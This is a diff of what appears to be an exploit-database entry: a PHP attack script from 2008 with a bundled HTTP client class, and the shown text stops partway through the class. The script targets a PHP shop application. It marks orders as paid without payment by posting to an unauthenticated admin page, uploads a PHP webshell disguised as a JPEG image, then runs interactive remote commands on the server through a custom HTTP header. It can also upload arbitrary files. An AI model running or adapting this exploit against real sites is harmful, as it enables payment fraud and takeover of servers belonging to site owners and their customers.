a/platforms/php/webapps/6006.php +++ b/platforms/php/webapps/6006.php 
@@ -1,812 +1,812 @@ -#!/usr/bin/php - | -| URL: http://blackh.free.fr - http://blackh.eu | -======================================================================== -| \$system> $argv[0] -url <> -a <1,2,3> -n <> -f <> | -| Notes: -url ex: http://victim.com/site/ | -| -a 1 : Validate Command without Payment | -| -n Commmand number (ex: CDE5627JOC ) | -| 2 : Remote Code Execution | -| -n Rubrique id (ex: 1 ) | -| 3 : Remote File Upload | -| -n Rubrique id (ex: 1 ) | -| -f Name of file (ex: leet.php ) | -| For 2 and 3, the '/client/' directory must not be forbidden | -======================================================================== -";exit(1); -} - -$url = getparam('url',1); -$action = getparam('a',1); -$n = getparam('n',1); -$f = getparam('f',0); - -$xpl = new phpsploit(); -$xpl->agent("Mozilla Firefox"); - -switch($action) { - - case '1': - valid_command($n); - break; - case '2': - remote_exec($n); - break; - case '3': - remote_upload($n, $f); - break; - default: - die('Please choose an action.'); - break; - -} - -# Validate Command without Payment -function valid_command($n) { - global $xpl, $url; - - echo "\n[-] Change command statut"; - echo "\n[-] Command: ".$n; - - - if($xpl->post($url.'admin/commande_details.php?ref='.$n, 'ref='.$n.'&statutch=2')) - die("\n[!] Done - Command is now 'paid' :))\n"); - else die("\n[!] Error - Maybe the code isn't good\n"); - - exit(1); -} - -# Remote Code Execution Exploit -function remote_exec($n) { - global $xpl, $url; - - echo "\n[-] Remote Code Execution"; - - if(is_forbidden($url)) die("\n[!] Error - The /client/ directory is forbidden\n"); - - $code = ''; - $form = array(frmdt_url => $url.'admin/photo_rubrique.php', - 'action' => 'ajouter', - 'rubid' => $n, - 'photo1' => array(frmdt_filename => 'tapz.php', - frmdt_type => 'image/jpeg', - frmdt_content => $code)); - - if($xpl->formdata($form)) echo "\n[!] Done - Start Shell"; - else die("\n[!] 
Error - Maybe the id isn't good\n"); - - $get = $xpl->get($url.'client/gfx/photos/rubrique/'); - $tmp = preg_match('#tapz_([0-9]*).php#', $get, $file); - - print "\n\$> "; - -while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){ - $xpl->addheader('SHELL',$cmd); - $xpl->get($url.'client/gfx/photos/rubrique/'.$file[0]); - print $xpl->getcontent()."\n\$> "; -} -} - -# Remote File Upload -function remote_upload($n, $f) { - global $xpl, $url; - - echo "\n[-] Remote File Upload"; - - if(is_forbidden($url)) die("\n[!] Error - The /client/ directory is forbidden\n"); - - $code = file_get_contents($f); - $form = array(frmdt_url => $url.'admin/photo_rubrique.php', - 'action' => 'ajouter', - 'rubid' => $n, - 'photo1' => array(frmdt_filename => $f, - frmdt_type => 'image/jpeg', - frmdt_content => $code)); - - if($xpl->formdata($form) && $code) echo "\n[!] Done - Now go on $url/client/gfx/photos/rubrique"; - else die("\n[!] Error - Maybe the id isn't good\n"); - -} - -function is_forbidden($url) { - global $xpl, $url; - - $get = $xpl->get($url.'/client/'); - if (preg_match('#Forbidden#i', $get)) return true; - else return false; -} - -# GetParam, function from acid-root.new.fr -function getparam($param,$opt='') -{ - global $argv; - foreach($argv as $value => $key) - { - if($key == '-'.$param) return $argv[$value+1]; - } - if($opt) exit("\n#error -$param parameter required"); - else return; -} - -/* - * - * Copyright (C) darkfig - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License - * as published by the Free Software Foundation; either version 2 - * of the License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. 
- * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. - * - * TITLE: PhpSploit Class - * REQUIREMENTS: PHP 4 / PHP 5 - * VERSION: 2.0 - * LICENSE: GNU General Public License - * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt - * FILENAME: phpsploitclass.php - * - * CONTACT: gmdarkfig@gmail.com (french / english) - * GREETZ: Sparah, Ddx39 - * - * DESCRIPTION: - * The phpsploit is a class implementing a web user agent. - * You can add cookies, headers, use a proxy server with (or without) a - * basic authentification. It supports the GET and the POST method. It can - * also be used like a browser with the cookiejar() function (which allow - * a server to add several cookies for the next requests) and the - * allowredirection() function (which allow the script to follow all - * redirections sent by the server). It can return the content (or the - * headers) of the request. Others useful functions can be used for debugging. - * A manual is actually in development but to know how to use it, you can - * read the comments. 
- * - * CHANGELOG: - * - * [2007-06-10] (2.0) - * * Code: Code optimization - * * New: Compatible with PHP 4 by default - * - * [2007-01-24] (1.2) - * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) - * * New: multipart/form-data enctype is now supported - * - * [2006-12-31] (1.1) - * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) - * * New: You can now call the getheader() / getcontent() function without parameters - * - * [2006-12-30] (1.0) - * * First version - * - */ - -class phpsploit -{ - var $proxyhost; - var $proxyport; - var $host; - var $path; - var $port; - var $method; - var $url; - var $packet; - var $proxyuser; - var $proxypass; - var $header; - var $cookie; - var $data; - var $boundary; - var $allowredirection; - var $last_redirection; - var $cookiejar; - var $recv; - var $cookie_str; - var $header_str; - var $server_content; - var $server_header; - - - /** - * This function is called by the - * get()/post()/formdata() functions. - * You don't have to call it, this is - * the main function. - * - * @access private - * @return string $this->recv ServerResponse - * - */ - function sock() - { - if(!empty($this->proxyhost) && !empty($this->proxyport)) - $socket = @fsockopen($this->proxyhost,$this->proxyport); - else - $socket = @fsockopen($this->host,$this->port); - - if(!$socket) - die("Error: Host seems down"); - - if($this->method=='get') - $this->packet = 'GET '.$this->url." HTTP/1.1\r\n"; - - elseif($this->method=='post' or $this->method=='formdata') - $this->packet = 'POST '.$this->url." 
HTTP/1.1\r\n"; - - else - die("Error: Invalid method"); - - if(!empty($this->proxyuser)) - $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; - - if(!empty($this->header)) - $this->packet .= $this->showheader(); - - if(!empty($this->cookie)) - $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; - - $this->packet .= 'Host: '.$this->host."\r\n"; - $this->packet .= "Connection: Close\r\n"; - - if($this->method=='post') - { - $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; - $this->packet .= $this->data."\r\n"; - } - elseif($this->method=='formdata') - { - $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; - $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; - $this->packet .= $this->data; - } - - $this->packet .= "\r\n"; - $this->recv = ''; - - fputs($socket,$this->packet); - - while(!feof($socket)) - $this->recv .= fgets($socket); - - fclose($socket); - - if($this->cookiejar) - $this->getcookie(); - - if($this->allowredirection) - return $this->getredirection(); - else - return $this->recv; - } - - - /** - * This function allows you to add several - * cookies in the request. - * - * @access public - * @param string cookn CookieName - * @param string cookv CookieValue - * @example $this->addcookie('name','value') - * - */ - function addcookie($cookn,$cookv) - { - if(!isset($this->cookie)) - $this->cookie = array(); - - $this->cookie[$cookn] = $cookv; - } - - - /** - * This function allows you to add several - * headers in the request. 
- * - * @access public - * @param string headern HeaderName - * @param string headervalue Headervalue - * @example $this->addheader('Client-IP', '128.5.2.3') - * - */ - function addheader($headern,$headervalue) - { - if(!isset($this->header)) - $this->header = array(); - - $this->header[$headern] = $headervalue; - } - - - /** - * This function allows you to use an - * http proxy server. Several methods - * are supported. - * - * @access public - * @param string proxy ProxyHost - * @param integer proxyp ProxyPort - * @example $this->proxy('localhost',8118) - * @example $this->proxy('localhost:8118') - * - */ - function proxy($proxy,$proxyp='') - { - if(empty($proxyp)) - { - $proxarr = explode(':',$proxy); - $this->proxyhost = $proxarr[0]; - $this->proxyport = (int)$proxarr[1]; - } - else - { - $this->proxyhost = $proxy; - $this->proxyport = (int)$proxyp; - } - - if($this->proxyport > 65535) - die("Error: Invalid port number"); - } - - - /** - * This function allows you to use an - * http proxy server which requires a - * basic authentification. Several - * methods are supported: - * - * @access public - * @param string proxyauth ProxyUser - * @param string proxypass ProxyPass - * @example $this->proxyauth('user','pwd') - * @example $this->proxyauth('user:pwd'); - * - */ - function proxyauth($proxyauth,$proxypass='') - { - if(empty($proxypass)) - { - $posvirg = strpos($proxyauth,':'); - $this->proxyuser = substr($proxyauth,0,$posvirg); - $this->proxypass = substr($proxyauth,$posvirg+1); - } - else - { - $this->proxyuser = $proxyauth; - $this->proxypass = $proxypass; - } - } - - - /** - * This function allows you to set - * the 'User-Agent' header. - * - * @access public - * @param string useragent Agent - * @example $this->agent('Firefox') - * - */ - function agent($useragent) - { - $this->addheader('User-Agent',$useragent); - } - - - /** - * This function returns the headers - * which will be in the next request. 
- * - * @access public - * @return string $this->header_str Headers - * @example $this->showheader() - * - */ - function showheader() - { - $this->header_str = ''; - - if(!isset($this->header)) - return; - - foreach($this->header as $name => $value) - $this->header_str .= $name.': '.$value."\r\n"; - - return $this->header_str; - } - - - /** - * This function returns the cookies - * which will be in the next request. - * - * @access public - * @return string $this->cookie_str Cookies - * @example $this->showcookie() - * - */ - function showcookie() - { - $this->cookie_str = ''; - - if(!isset($this->cookie)) - return; - - foreach($this->cookie as $name => $value) - $this->cookie_str .= $name.'='.$value.'; '; - - return $this->cookie_str; - } - - - /** - * This function returns the last - * formed http request. - * - * @access public - * @return string $this->packet HttpPacket - * @example $this->showlastrequest() - * - */ - function showlastrequest() - { - if(!isset($this->packet)) - return; - else - return $this->packet; - } - - - /** - * This function sends the formed - * http packet with the GET method. - * - * @access public - * @param string url Url - * @return string $this->sock() - * @example $this->get('localhost/index.php?var=x') - * @example $this->get('http://localhost:88/tst.php') - * - */ - function get($url) - { - $this->target($url); - $this->method = 'get'; - return $this->sock(); - } - - - /** - * This function sends the formed - * http packet with the POST method. - * - * @access public - * @param string url Url - * @param string data PostData - * @return string $this->sock() - * @example $this->post('http://localhost/','helo=x') - * - */ - function post($url,$data) - { - $this->target($url); - $this->method = 'post'; - $this->data = $data; - return $this->sock(); - } - - - /** - * This function sends the formed http - * packet with the POST method using - * the multipart/form-data enctype. 
- * - * @access public - * @param array array FormDataArray - * @return string $this->sock() - * @example $formdata = array( - * frmdt_url => 'http://localhost/upload.php', - * frmdt_boundary => '123456', # Optional - * 'var' => 'example', - * 'file' => array( - * frmdt_type => 'image/gif', # Optional - * frmdt_transfert => 'binary' # Optional - * frmdt_filename => 'hello.php, - * frmdt_content => '')); - * $this->formdata($formdata); - * - */ - function formdata($array) - { - $this->target($array[frmdt_url]); - $this->method = 'formdata'; - $this->data = ''; - - if(!isset($array[frmdt_boundary])) - $this->boundary = 'phpsploit'; - else - $this->boundary = $array[frmdt_boundary]; - - foreach($array as $key => $value) - { - if(!preg_match('#^frmdt_(boundary|url)#',$key)) - { - $this->data .= str_repeat('-',29).$this->boundary."\r\n"; - $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; - - if(!is_array($value)) - { - $this->data .= "\r\n\r\n".$value."\r\n"; - } - else - { - $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; - - if(isset($array[$key][frmdt_type])) - $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; - - if(isset($array[$key][frmdt_transfert])) - $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; - - $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; - } - } - } - - $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; - return $this->sock(); - } - - - /** - * This function returns the content - * of the server response, without - * the headers. 
- * - * @access public - * @param string code ServerResponse - * @return string $this->server_content - * @example $this->getcontent() - * @example $this->getcontent($this->get('http://localhost/')) - * - */ - function getcontent($code='') - { - if(empty($code)) - $code = $this->recv; - - $code = explode("\r\n\r\n",$code); - $this->server_content = ''; - - for($i=1;$iserver_content .= $code[$i]; - - return $this->server_content; - } - - - /** - * This function returns the headers - * of the server response, without - * the content. - * - * @access public - * @param string code ServerResponse - * @return string $this->server_header - * @example $this->getcontent() - * @example $this->getcontent($this->post('http://localhost/','1=2')) - * - */ - function getheader($code='') - { - if(empty($code)) - $code = $this->recv; - - $code = explode("\r\n\r\n",$code); - $this->server_header = $code[0]; - - return $this->server_header; - } - - - /** - * This function is called by the - * cookiejar() function. It adds the - * value of the "Set-Cookie" header - * in the "Cookie" header for the - * next request. You don't have to - * call it. - * - * @access private - * @param string code ServerResponse - * - */ - function getcookie() - { - foreach(explode("\r\n",$this->getheader()) as $header) - { - if(preg_match('/set-cookie/i',$header)) - { - $fequal = strpos($header,'='); - $fvirgu = strpos($header,';'); - - // 12=strlen('set-cookie: ') - $cname = substr($header,12,$fequal-12); - $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); - - $this->cookie[trim($cname)] = trim($cvalu); - } - } - } - - - /** - * This function is called by the - * get()/post() functions. You - * don't have to call it. 
- * - * @access private - * @param string urltarg Url - * @example $this->target('http://localhost/') - * - */ - function target($urltarg) - { - if(!ereg('^http://',$urltarg)) - $urltarg = 'http://'.$urltarg; - - $urlarr = parse_url($urltarg); - $this->url = 'http://'.$urlarr['host'].$urlarr['path']; - - if(isset($urlarr['query'])) - $this->url .= '?'.$urlarr['query']; - - $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; - $this->host = $urlarr['host']; - - if($this->port != '80') - $this->host .= ':'.$this->port; - - if(!isset($urlarr['path']) or empty($urlarr['path'])) - die("Error: No path precised"); - - $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); - - if($this->port > 65535) - die("Error: Invalid port number"); - } - - - /** - * If you call this function, - * the script will extract all - * 'Set-Cookie' headers values - * and it will automatically add - * them into the 'Cookie' header - * for all next requests. - * - * @access public - * @param integer code 1(enabled) 0(disabled) - * @example $this->cookiejar(0) - * @example $this->cookiejar(1) - * - */ - function cookiejar($code) - { - if($code=='0') - $this->cookiejar=FALSE; - - elseif($code=='1') - $this->cookiejar=TRUE; - } - - - /** - * If you call this function, - * the script will follow all - * redirections sent by the server. - * - * @access public - * @param integer code 1(enabled) 0(disabled) - * @example $this->allowredirection(0) - * @example $this->allowredirection(1) - * - */ - function allowredirection($code) - { - if($code=='0') - $this->allowredirection=FALSE; - - elseif($code=='1') - $this->allowredirection=TRUE; - } - - - /** - * This function is called if - * allowredirection() is enabled. - * You don't have to call it. 
- * - * @access private - * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection) - * @return string $this->get($this->last_redirection) - * @return string $this->recv; - * - */ - function getredirection() - { - if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) - { - $this->last_redirection = trim($codearr[2]); - - if(!ereg('://',$this->last_redirection)) - return $this->get('http://'.$this->host.$this->path.$this->last_redirection); - - else - return $this->get($this->last_redirection); - } - else - return $this->recv; - } - - - /** - * This function allows you - * to reset some parameters. - * - * @access public - * @param string func Param - * @example $this->reset('header') - * @example $this->reset('cookie') - * @example $this->reset() - * - */ - function reset($func='') - { - switch($func) - { - case 'header': - $this->header = array(''); - break; - - case 'cookie': - $this->cookie = array(''); - break; - - default: - $this->cookiejar = ''; - $this->header = array(''); - $this->cookie = array(''); - $this->allowredirection = ''; - break; - } - } -} - -?> - -# milw0rm.com [2008-07-05] +#!/usr/bin/php + | +| URL: http://blackh.free.fr - http://blackh.eu | +======================================================================== +| \$system> $argv[0] -url <> -a <1,2,3> -n <> -f <> | +| Notes: -url ex: http://victim.com/site/ | +| -a 1 : Validate Command without Payment | +| -n Commmand number (ex: CDE5627JOC ) | +| 2 : Remote Code Execution | +| -n Rubrique id (ex: 1 ) | +| 3 : Remote File Upload | +| -n Rubrique id (ex: 1 ) | +| -f Name of file (ex: leet.php ) | +| For 2 and 3, the '/client/' directory must not be forbidden | +======================================================================== +";exit(1); +} + +$url = getparam('url',1); +$action = getparam('a',1); +$n = getparam('n',1); +$f = getparam('f',0); + +$xpl = new phpsploit(); +$xpl->agent("Mozilla Firefox"); + +switch($action) { 
+ + case '1': + valid_command($n); + break; + case '2': + remote_exec($n); + break; + case '3': + remote_upload($n, $f); + break; + default: + die('Please choose an action.'); + break; + +} + +# Validate Command without Payment +function valid_command($n) { + global $xpl, $url; + + echo "\n[-] Change command statut"; + echo "\n[-] Command: ".$n; + + + if($xpl->post($url.'admin/commande_details.php?ref='.$n, 'ref='.$n.'&statutch=2')) + die("\n[!] Done - Command is now 'paid' :))\n"); + else die("\n[!] Error - Maybe the code isn't good\n"); + + exit(1); +} + +# Remote Code Execution Exploit +function remote_exec($n) { + global $xpl, $url; + + echo "\n[-] Remote Code Execution"; + + if(is_forbidden($url)) die("\n[!] Error - The /client/ directory is forbidden\n"); + + $code = ''; + $form = array(frmdt_url => $url.'admin/photo_rubrique.php', + 'action' => 'ajouter', + 'rubid' => $n, + 'photo1' => array(frmdt_filename => 'tapz.php', + frmdt_type => 'image/jpeg', + frmdt_content => $code)); + + if($xpl->formdata($form)) echo "\n[!] Done - Start Shell"; + else die("\n[!] Error - Maybe the id isn't good\n"); + + $get = $xpl->get($url.'client/gfx/photos/rubrique/'); + $tmp = preg_match('#tapz_([0-9]*).php#', $get, $file); + + print "\n\$> "; + +while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){ + $xpl->addheader('SHELL',$cmd); + $xpl->get($url.'client/gfx/photos/rubrique/'.$file[0]); + print $xpl->getcontent()."\n\$> "; +} +} + +# Remote File Upload +function remote_upload($n, $f) { + global $xpl, $url; + + echo "\n[-] Remote File Upload"; + + if(is_forbidden($url)) die("\n[!] Error - The /client/ directory is forbidden\n"); + + $code = file_get_contents($f); + $form = array(frmdt_url => $url.'admin/photo_rubrique.php', + 'action' => 'ajouter', + 'rubid' => $n, + 'photo1' => array(frmdt_filename => $f, + frmdt_type => 'image/jpeg', + frmdt_content => $code)); + + if($xpl->formdata($form) && $code) echo "\n[!] 
Done - Now go on $url/client/gfx/photos/rubrique"; + else die("\n[!] Error - Maybe the id isn't good\n"); + +} + +function is_forbidden($url) { + global $xpl, $url; + + $get = $xpl->get($url.'/client/'); + if (preg_match('#Forbidden#i', $get)) return true; + else return false; +} + +# GetParam, function from acid-root.new.fr +function getparam($param,$opt='') +{ + global $argv; + foreach($argv as $value => $key) + { + if($key == '-'.$param) return $argv[$value+1]; + } + if($opt) exit("\n#error -$param parameter required"); + else return; +} + +/* + * + * Copyright (C) darkfig + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. + * + * TITLE: PhpSploit Class + * REQUIREMENTS: PHP 4 / PHP 5 + * VERSION: 2.0 + * LICENSE: GNU General Public License + * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt + * FILENAME: phpsploitclass.php + * + * CONTACT: gmdarkfig@gmail.com (french / english) + * GREETZ: Sparah, Ddx39 + * + * DESCRIPTION: + * The phpsploit is a class implementing a web user agent. + * You can add cookies, headers, use a proxy server with (or without) a + * basic authentification. It supports the GET and the POST method. 
It can + * also be used like a browser with the cookiejar() function (which allow + * a server to add several cookies for the next requests) and the + * allowredirection() function (which allow the script to follow all + * redirections sent by the server). It can return the content (or the + * headers) of the request. Others useful functions can be used for debugging. + * A manual is actually in development but to know how to use it, you can + * read the comments. + * + * CHANGELOG: + * + * [2007-06-10] (2.0) + * * Code: Code optimization + * * New: Compatible with PHP 4 by default + * + * [2007-01-24] (1.2) + * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) + * * New: multipart/form-data enctype is now supported + * + * [2006-12-31] (1.1) + * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) + * * New: You can now call the getheader() / getcontent() function without parameters + * + * [2006-12-30] (1.0) + * * First version + * + */ + +class phpsploit +{ + var $proxyhost; + var $proxyport; + var $host; + var $path; + var $port; + var $method; + var $url; + var $packet; + var $proxyuser; + var $proxypass; + var $header; + var $cookie; + var $data; + var $boundary; + var $allowredirection; + var $last_redirection; + var $cookiejar; + var $recv; + var $cookie_str; + var $header_str; + var $server_content; + var $server_header; + + + /** + * This function is called by the + * get()/post()/formdata() functions. + * You don't have to call it, this is + * the main function. + * + * @access private + * @return string $this->recv ServerResponse + * + */ + function sock() + { + if(!empty($this->proxyhost) && !empty($this->proxyport)) + $socket = @fsockopen($this->proxyhost,$this->proxyport); + else + $socket = @fsockopen($this->host,$this->port); + + if(!$socket) + die("Error: Host seems down"); + + if($this->method=='get') + $this->packet = 'GET '.$this->url." 
HTTP/1.1\r\n"; + + elseif($this->method=='post' or $this->method=='formdata') + $this->packet = 'POST '.$this->url." HTTP/1.1\r\n"; + + else + die("Error: Invalid method"); + + if(!empty($this->proxyuser)) + $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; + + if(!empty($this->header)) + $this->packet .= $this->showheader(); + + if(!empty($this->cookie)) + $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; + + $this->packet .= 'Host: '.$this->host."\r\n"; + $this->packet .= "Connection: Close\r\n"; + + if($this->method=='post') + { + $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; + $this->packet .= $this->data."\r\n"; + } + elseif($this->method=='formdata') + { + $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; + $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; + $this->packet .= $this->data; + } + + $this->packet .= "\r\n"; + $this->recv = ''; + + fputs($socket,$this->packet); + + while(!feof($socket)) + $this->recv .= fgets($socket); + + fclose($socket); + + if($this->cookiejar) + $this->getcookie(); + + if($this->allowredirection) + return $this->getredirection(); + else + return $this->recv; + } + + + /** + * This function allows you to add several + * cookies in the request. + * + * @access public + * @param string cookn CookieName + * @param string cookv CookieValue + * @example $this->addcookie('name','value') + * + */ + function addcookie($cookn,$cookv) + { + if(!isset($this->cookie)) + $this->cookie = array(); + + $this->cookie[$cookn] = $cookv; + } + + + /** + * This function allows you to add several + * headers in the request. 
+ * + * @access public + * @param string headern HeaderName + * @param string headervalue Headervalue + * @example $this->addheader('Client-IP', '128.5.2.3') + * + */ + function addheader($headern,$headervalue) + { + if(!isset($this->header)) + $this->header = array(); + + $this->header[$headern] = $headervalue; + } + + + /** + * This function allows you to use an + * http proxy server. Several methods + * are supported. + * + * @access public + * @param string proxy ProxyHost + * @param integer proxyp ProxyPort + * @example $this->proxy('localhost',8118) + * @example $this->proxy('localhost:8118') + * + */ + function proxy($proxy,$proxyp='') + { + if(empty($proxyp)) + { + $proxarr = explode(':',$proxy); + $this->proxyhost = $proxarr[0]; + $this->proxyport = (int)$proxarr[1]; + } + else + { + $this->proxyhost = $proxy; + $this->proxyport = (int)$proxyp; + } + + if($this->proxyport > 65535) + die("Error: Invalid port number"); + } + + + /** + * This function allows you to use an + * http proxy server which requires a + * basic authentification. Several + * methods are supported: + * + * @access public + * @param string proxyauth ProxyUser + * @param string proxypass ProxyPass + * @example $this->proxyauth('user','pwd') + * @example $this->proxyauth('user:pwd'); + * + */ + function proxyauth($proxyauth,$proxypass='') + { + if(empty($proxypass)) + { + $posvirg = strpos($proxyauth,':'); + $this->proxyuser = substr($proxyauth,0,$posvirg); + $this->proxypass = substr($proxyauth,$posvirg+1); + } + else + { + $this->proxyuser = $proxyauth; + $this->proxypass = $proxypass; + } + } + + + /** + * This function allows you to set + * the 'User-Agent' header. + * + * @access public + * @param string useragent Agent + * @example $this->agent('Firefox') + * + */ + function agent($useragent) + { + $this->addheader('User-Agent',$useragent); + } + + + /** + * This function returns the headers + * which will be in the next request. 
+ * + * @access public + * @return string $this->header_str Headers + * @example $this->showheader() + * + */ + function showheader() + { + $this->header_str = ''; + + if(!isset($this->header)) + return; + + foreach($this->header as $name => $value) + $this->header_str .= $name.': '.$value."\r\n"; + + return $this->header_str; + } + + + /** + * This function returns the cookies + * which will be in the next request. + * + * @access public + * @return string $this->cookie_str Cookies + * @example $this->showcookie() + * + */ + function showcookie() + { + $this->cookie_str = ''; + + if(!isset($this->cookie)) + return; + + foreach($this->cookie as $name => $value) + $this->cookie_str .= $name.'='.$value.'; '; + + return $this->cookie_str; + } + + + /** + * This function returns the last + * formed http request. + * + * @access public + * @return string $this->packet HttpPacket + * @example $this->showlastrequest() + * + */ + function showlastrequest() + { + if(!isset($this->packet)) + return; + else + return $this->packet; + } + + + /** + * This function sends the formed + * http packet with the GET method. + * + * @access public + * @param string url Url + * @return string $this->sock() + * @example $this->get('localhost/index.php?var=x') + * @example $this->get('http://localhost:88/tst.php') + * + */ + function get($url) + { + $this->target($url); + $this->method = 'get'; + return $this->sock(); + } + + + /** + * This function sends the formed + * http packet with the POST method. + * + * @access public + * @param string url Url + * @param string data PostData + * @return string $this->sock() + * @example $this->post('http://localhost/','helo=x') + * + */ + function post($url,$data) + { + $this->target($url); + $this->method = 'post'; + $this->data = $data; + return $this->sock(); + } + + + /** + * This function sends the formed http + * packet with the POST method using + * the multipart/form-data enctype. 
+ * + * @access public + * @param array array FormDataArray + * @return string $this->sock() + * @example $formdata = array( + * frmdt_url => 'http://localhost/upload.php', + * frmdt_boundary => '123456', # Optional + * 'var' => 'example', + * 'file' => array( + * frmdt_type => 'image/gif', # Optional + * frmdt_transfert => 'binary' # Optional + * frmdt_filename => 'hello.php, + * frmdt_content => '')); + * $this->formdata($formdata); + * + */ + function formdata($array) + { + $this->target($array[frmdt_url]); + $this->method = 'formdata'; + $this->data = ''; + + if(!isset($array[frmdt_boundary])) + $this->boundary = 'phpsploit'; + else + $this->boundary = $array[frmdt_boundary]; + + foreach($array as $key => $value) + { + if(!preg_match('#^frmdt_(boundary|url)#',$key)) + { + $this->data .= str_repeat('-',29).$this->boundary."\r\n"; + $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; + + if(!is_array($value)) + { + $this->data .= "\r\n\r\n".$value."\r\n"; + } + else + { + $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; + + if(isset($array[$key][frmdt_type])) + $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; + + if(isset($array[$key][frmdt_transfert])) + $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; + + $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; + } + } + } + + $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; + return $this->sock(); + } + + + /** + * This function returns the content + * of the server response, without + * the headers. 
+ * + * @access public + * @param string code ServerResponse + * @return string $this->server_content + * @example $this->getcontent() + * @example $this->getcontent($this->get('http://localhost/')) + * + */ + function getcontent($code='') + { + if(empty($code)) + $code = $this->recv; + + $code = explode("\r\n\r\n",$code); + $this->server_content = ''; + + for($i=1;$iserver_content .= $code[$i]; + + return $this->server_content; + } + + + /** + * This function returns the headers + * of the server response, without + * the content. + * + * @access public + * @param string code ServerResponse + * @return string $this->server_header + * @example $this->getcontent() + * @example $this->getcontent($this->post('http://localhost/','1=2')) + * + */ + function getheader($code='') + { + if(empty($code)) + $code = $this->recv; + + $code = explode("\r\n\r\n",$code); + $this->server_header = $code[0]; + + return $this->server_header; + } + + + /** + * This function is called by the + * cookiejar() function. It adds the + * value of the "Set-Cookie" header + * in the "Cookie" header for the + * next request. You don't have to + * call it. + * + * @access private + * @param string code ServerResponse + * + */ + function getcookie() + { + foreach(explode("\r\n",$this->getheader()) as $header) + { + if(preg_match('/set-cookie/i',$header)) + { + $fequal = strpos($header,'='); + $fvirgu = strpos($header,';'); + + // 12=strlen('set-cookie: ') + $cname = substr($header,12,$fequal-12); + $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); + + $this->cookie[trim($cname)] = trim($cvalu); + } + } + } + + + /** + * This function is called by the + * get()/post() functions. You + * don't have to call it. 
+ * + * @access private + * @param string urltarg Url + * @example $this->target('http://localhost/') + * + */ + function target($urltarg) + { + if(!ereg('^http://',$urltarg)) + $urltarg = 'http://'.$urltarg; + + $urlarr = parse_url($urltarg); + $this->url = 'http://'.$urlarr['host'].$urlarr['path']; + + if(isset($urlarr['query'])) + $this->url .= '?'.$urlarr['query']; + + $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; + $this->host = $urlarr['host']; + + if($this->port != '80') + $this->host .= ':'.$this->port; + + if(!isset($urlarr['path']) or empty($urlarr['path'])) + die("Error: No path precised"); + + $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); + + if($this->port > 65535) + die("Error: Invalid port number"); + } + + + /** + * If you call this function, + * the script will extract all + * 'Set-Cookie' headers values + * and it will automatically add + * them into the 'Cookie' header + * for all next requests. + * + * @access public + * @param integer code 1(enabled) 0(disabled) + * @example $this->cookiejar(0) + * @example $this->cookiejar(1) + * + */ + function cookiejar($code) + { + if($code=='0') + $this->cookiejar=FALSE; + + elseif($code=='1') + $this->cookiejar=TRUE; + } + + + /** + * If you call this function, + * the script will follow all + * redirections sent by the server. + * + * @access public + * @param integer code 1(enabled) 0(disabled) + * @example $this->allowredirection(0) + * @example $this->allowredirection(1) + * + */ + function allowredirection($code) + { + if($code=='0') + $this->allowredirection=FALSE; + + elseif($code=='1') + 